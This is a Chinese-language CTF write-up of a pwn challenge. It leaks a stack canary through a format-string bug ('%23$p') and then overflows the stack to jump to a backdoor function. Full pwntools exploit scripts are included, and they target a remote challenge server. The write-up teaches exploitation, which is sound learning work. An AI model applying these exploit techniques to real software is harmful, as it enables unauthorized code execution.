0x01源码分析
今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。
checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。
0x02 格式化字符串漏洞
先用老脚本看一下格式化串的相对偏移。
#search_offset.py
#encoding:utf-8
from pwn import *
context.log_level = 'debug'
n = 1
while 1:
p = remote('220.249.52.133',51563)
p.recvuntil("le \n")
p.sendline("2")
p.sendline("aaaa%{}$p".format(n))
recv = p.recvuntil("\n")
print recv
if '61616161' in recv:
print(n)
break
else:
n += 1
p.interactive()
得到偏移为6,那么格式化字符串在栈中的分布大概如下所示:
容易计算出canary的偏移为6+17=23
所以我们用payload = 'aaaa%23$p’就可以泄露出canary的值
0x03栈溢出
得到canary之后,我们可以构造
payload = 0x88*‘a’+p64(canary)+0x8*‘a’+p64(back_door)完成栈溢出,覆盖返回地址为后门函数的地址。
整体的exp如下:
#coding:utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h'] #pwndbg适配该终端,加上这句话,我们就可以在一个终端进行分屏调试,分屏的切换一类的操作还需要查看一下tmux如何使用
ip = '220.249.52.133'
port = 51563
process_name = ''
if args.G: #还没搞清楚是什么原理,但是用法就是在参数列表中加个G就可以进入本地调试的分支
sh = process(process_name)
addr=''
gdb.attach(sh, "b *" + addr)
else:
sh = remote(ip,port)
back_door = 0x4008DA
sh.recvuntil('le \n')
sh.sendline('2')
payload = 'aaaa%23$p'
sh.sendline(payload)
sh.recvuntil('aaaa')
canary = int(sh.recvuntil('\n')[2:-1],16)
success(hex(canary))
sh.recvuntil('le \n')
sh.sendline('1')
payload = 0x88*'a'+p64(canary)+0x8*'a'+p64(back_door)
sh.sendline(payload)
sh.interactive()